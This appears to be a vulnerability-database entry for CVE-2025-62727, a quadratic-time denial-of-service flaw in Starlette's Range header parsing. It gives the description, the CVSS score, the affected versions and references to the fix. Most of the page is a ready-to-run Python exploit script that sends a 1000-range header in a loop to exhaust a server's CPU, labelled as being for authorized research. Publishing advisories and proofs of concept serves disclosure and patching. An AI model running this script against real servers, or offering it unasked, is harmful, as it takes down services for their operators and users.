Security Vulnerability Report
CVE-2025-62727 CVSS 7.5 HIGH

Published: 2025-10-28 21:15:40
Last Modified: 2026-04-15 00:35:42

Description

Starlette is a lightweight ASGI framework/toolkit. Starting in version 0.39.0 and prior to version 0.49.1, an unauthenticated attacker can send a crafted HTTP Range header that triggers quadratic-time processing in Starlette's FileResponse Range parsing/merging logic. This enables CPU exhaustion per request, causing denial-of-service for endpoints serving files (e.g., StaticFiles or any use of FileResponse). This vulnerability is fixed in 0.49.1.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No CPE configuration data available for this entry.

Affected version range (from the description): Starlette >= 0.39.0, < 0.49.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import httpx
import time

# CVE-2025-62727 PoC - Starlette FileResponse DoS via Range Header
# Target: Starlette application with StaticFiles or FileResponse


def exploit_cve_2025_62727(target_url: str, duration: int = 10):
    """
    PoC for CVE-2025-62727

    Sends crafted Range header to trigger quadratic-time processing

    Args:
        target_url: URL of the vulnerable Starlette endpoint
        duration: Attack duration in seconds
    """
    # Generate malicious Range header with many overlapping ranges
    # This triggers O(n²) complexity in Range parsing/merging logic
    ranges = []
    for i in range(1000):  # 1000 overlapping ranges
        ranges.append(f"{i}-{i+100}")

    range_header = "bytes=" + ",".join(ranges)

    headers = {
        "Range": range_header,
        "User-Agent": "CVE-2025-62727-PoC",
    }

    print(f"[*] Starting DoS attack against {target_url}")
    print(f"[*] Range header length: {len(range_header)} bytes")
    print(f"[*] Number of ranges: {len(ranges)}")

    start_time = time.time()
    attack_count = 0

    try:
        with httpx.Client(timeout=30.0) as client:
            while time.time() - start_time < duration:
                try:
                    response = client.get(target_url, headers=headers)
                    attack_count += 1
                    print(f"[+] Request {attack_count} sent, status: {response.status_code}")
                except httpx.TimeoutException:
                    print("[!] Request timeout - target may be exhausted")
                    attack_count += 1
                except Exception as e:
                    print(f"[!] Error: {e}")
    except KeyboardInterrupt:
        print("\n[!] Attack interrupted by user")

    elapsed = time.time() - start_time
    print("\n[*] Attack completed")
    print(f"[*] Total requests: {attack_count}")
    print(f"[*] Duration: {elapsed:.2f} seconds")


if __name__ == "__main__":
    # Example usage
    target = "http://vulnerable-server:8000/static/large-file.bin"
    exploit_cve_2025_62727(target, duration=30)

Weakness

CWE-407 (Inefficient Algorithmic Complexity)

References

https://github.com/Kludex/starlette/security/advisories/GHSA-7f5h-v6xp-fcq8
https://github.com/Kludex/starlette/commit/4ea6e22b489ec388d6004cfbca52dd5b147127c5
https://github.com/Kludex/starlette/commit/69ed26a85956ef4bd0161807eb27abf49be7cd3c
https://github.com/Kludex/starlette/releases/tag/0.49.1
